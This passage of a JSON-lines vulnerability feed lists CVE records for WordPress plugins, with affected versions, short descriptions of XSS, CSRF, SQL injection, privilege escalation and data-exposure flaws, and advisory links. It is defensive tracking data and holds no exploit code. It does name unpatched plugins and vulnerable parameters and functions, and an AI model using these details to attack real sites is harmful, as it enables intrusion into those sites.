vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3cf9f38-c20e-40dc-a7a1-65b0c6ba7925?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3cf9f38-c20e-40dc-a7a1-65b0c6ba7925?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1760","slug":"simply-schedule-appointments","versionImpact":"1.6.6.20","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.6.20. This is due to missing or incorrect nonce validation on the ssa_factory_reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php#L527\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php#L527\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042890\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042890\\\/simply-schedule-appointments\\\/trunk\\\/includes\\\/class-support.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0867","slug":"email-log","versionImpact":"2.4.8","description":"The Email Log plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 2.4.8 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-log\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2926","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 8.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e9beef-4d2b-4004-8db7-4963882e405b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e9beef-4d2b-4004-8db7-4963882e405b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/carousel\\\/loop.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/carousel\\\/loop.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-slider\\\/loop-start.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-slider\\\/loop-start.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-multislider\\\/loop-start.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-multislider\\\/loop-start.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-gridbox-slider\\\/loop-start.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-gridbox-slider\\\/loop-start.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-carousel\\\/loop-start.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/posts-carousel\\\/loop-start.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.6\\\/templates\\\/addons\\\/animated-text\\\/loop.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7778","slug":"themeisle-companion","versionImpact":"2.10.36","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.10.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be83c6be-fb6c-462f-b54a-ca12d6d2581f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be83c6be-fb6c-462f-b54a-ca12d6d2581f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.36\\\/obfx_modules\\\/custom-fonts\\\/custom_fonts_admin.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.36\\\/obfx_modules\\\/custom-fonts\\\/custom_fonts_admin.php#L376\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/#file71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/#file71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139233\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9069","slug":"graphicsly","versionImpact":"1.0.2","description":"The Graphicsly \u2013 The ultimate graphics plugin for WordPress website builder ( Gutenberg, Elementor, Beaver Builder, WPBakery ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/343a6dbd-baf5-4de8-ae3e-6954fd3f1556?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/343a6dbd-baf5-4de8-ae3e-6954fd3f1556?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/graphicsly\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/graphicsly\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10184","slug":"streamweasels-kick-integration","versionImpact":"1.1.1","description":"The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-kick-embed shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077a31e7-de4b-418f-ac90-5c51a690bc65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/077a31e7-de4b-418f-ac90-5c51a690bc65?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176023\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10268","slug":"mp3-music-player-by-sonaar","versionImpact":"5.8","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/861d0218-0f0f-4299-a0ff-854832348457?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/861d0218-0f0f-4299-a0ff-854832348457?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188034\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188034\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12166","slug":"ultimate-shortcodes-creator","versionImpact":"2.2.0","description":"The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-shortcode-list-table.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-shortcode-list-table.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ece9b6d-6802-44b9-9ead-1563286f4ff3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ece9b6d-6802-44b9-9ead-1563286f4ff3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22349","slug":"wp-auctions","versionImpact":"3.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows SQL Injection. This issue affects WordPress Auction Plugin: from n\/a through 3.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auctions\\\/vulnerability\\\/wordpress-wordpress-auction-plugin-plugin-3-7-sql-injection-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13841","slug":"builder-shortcode-extras","versionImpact":"1.0.0","description":"The Builder Shortcode Extras \u2013 WordPress Shortcodes Collection to Save You Time plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.0 via the 'bse-elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created with Elementor that they should not have access to.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/builder-shortcode-extras\\\/tags\\\/1.0.0\\\/includes\\\/shortcodes\\\/elementor.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/builder-shortcode-extras\\\/tags\\\/1.0.0\\\/includes\\\/shortcodes\\\/elementor.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/642dc1d3-a008-4af8-ba9e-dbdd37b93126?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/642dc1d3-a008-4af8-ba9e-dbdd37b93126?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2840","slug":"dap-to-autoresponders-daar","versionImpact":"1.0","description":"The DAP to Autoresponders Email Syncing plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dap-to-autoresponders-daar\\\/trunk\\\/infusionsoft_src\\\/phpinfo.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dap-to-autoresponders-daar\\\/trunk\\\/infusionsoft_src\\\/phpinfo.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dap-to-autoresponders-daar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dap-to-autoresponders-daar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff90774-f5f6-4d9c-9565-1cff31f9bec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff90774-f5f6-4d9c-9565-1cff31f9bec4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5486","slug":"wp-email-debug","versionImpact":"1.1.0","description":"The WP Email Debug plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the WPMDBUG_handle_settings() function in versions 1.0 to 1.1.0. This makes it possible for unauthenticated attackers to enable debugging and send all emails to an attacker controlled address and then trigger a password reset for an administrator to gain access to an administrator account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-email-debug\\\/trunk\\\/hooks.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-email-debug\\\/trunk\\\/hooks.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3af64a2-3bd6-47af-919e-00c5249dcc74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3af64a2-3bd6-47af-919e-00c5249dcc74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4752","slug":"wp-opening-hours","versionImpact":"2.3.0","description":"The Opening Hours WordPress plugin through 2.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309799dd-dea7-489d-8d18-b6014534f5af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309799dd-dea7-489d-8d18-b6014534f5af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4384","slug":"photo-contest","versionImpact":"1.0.6","description":"The WordPress Photo Gallery \u2013 Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on the load_images_thumbnail() and edit_gallery() functions. This makes it possible for unauthenticated attackers to edit galleries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/admin\\\/admin-page-galleries.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/admin\\\/admin-page-galleries.php#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1355bc94-7110-4d61-855e-78889e58dcad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1355bc94-7110-4d61-855e-78889e58dcad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/view\\\/ajax-function.php#L559\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-contest\\\/tags\\\/1.0.6\\\/includes\\\/view\\\/ajax-function.php#L559\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4520","slug":"fv-wordpress-flowplayer","versionImpact":"7.5.37.7212","description":"The FV Flowplayer Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_fv_player_user_video\u2019 parameter saved via the 'save' function hooked via init, and the plugin is also vulnerable to Arbitrary Usermeta Update via the 'save' function in versions up to, and including, 7.5.37.7212 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, and makes it possible to update the user metas arbitrarily, but the meta value can only be a string.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2957322\\\/fv-wordpress-flowplayer#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2957322\\\/fv-wordpress-flowplayer#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fv-wordpress-flowplayer\\\/tags\\\/7.5.36.7212\\\/models\\\/custom-videos.php#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fv-wordpress-flowplayer\\\/tags\\\/7.5.36.7212\\\/models\\\/custom-videos.php#L341\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c55ca7d4-6bc0-49c9-8ce0-50fff8775a76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c55ca7d4-6bc0-49c9-8ce0-50fff8775a76?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1761","slug":"wp-whatsapp","versionImpact":"3.6.1","description":"The WP Chat App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget\/block in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'buttonColor' and 'phoneNumber'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1697","slug":"add-fields-to-checkout-page-woocommerce","versionImpact":"1.3.1","description":"The Custom WooCommerce Checkout Fields Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the save_wcfe_options function in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a92f44b-6f2b-439c-8245-ace189740425?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a92f44b-6f2b-439c-8245-ace189740425?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.2.9\\\/classes\\\/class-wc-checkout-field-editor.php#L1775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.2.9\\\/classes\\\/class-wc-checkout-field-editor.php#L1775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.3.2\\\/classes\\\/class-wc-checkout-field-editor.php#L1788\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-fields-to-checkout-page-woocommerce\\\/tags\\\/1.3.2\\\/classes\\\/class-wc-checkout-field-editor.php#L1788\",\"refsource\":\"\",\"tags\":[]}]"}
